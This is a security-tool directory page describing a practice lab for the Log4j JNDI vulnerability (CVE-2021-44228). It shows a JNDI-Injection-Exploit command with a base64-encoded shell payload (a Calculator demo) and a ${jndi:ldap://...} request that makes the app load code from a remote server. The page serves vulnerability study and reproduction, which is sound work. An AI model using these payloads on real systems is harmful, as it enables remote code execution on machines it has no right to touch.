Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-44228-Log4j-JNDI — CVE-2021-44228 Vulnerability Reproduction Environment CVE-2021-44228 漏洞复现环境 | Kitploit
Tools/GitHubGitHub/x1ongsec/cve-2021-44228-log4j-jndi
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubx1ongsec/cve-2021-44228-log4j-jndi

CVE-2021-44228-Log4j-JNDI

CVE-2021-44228 Vulnerability Reproduction Environment CVE-2021-44228 漏洞复现环境

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
251 year agoNot yet reviewed
Share

Access

After the project starts, visit: http://127.0.0.1:9090/vul

Vulnerability Reproduction

JDK version: java8u92 (Avoid using too high a version; it is recommended to use the same as mine, as higher versions have certain restrictions on JNDI injection)

root@kitploit:~
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,b3BlbiAtYSBDYWxjdWxhdG9y}|{base64,-d}|{bash,-i}" -A 127.0.0.1

Use the above tool to generate PAYLOAD.

Visit http://127.0.0.1:9090/vul?action=${jndi:ldap://your_ip:port/xxx}

Download Tool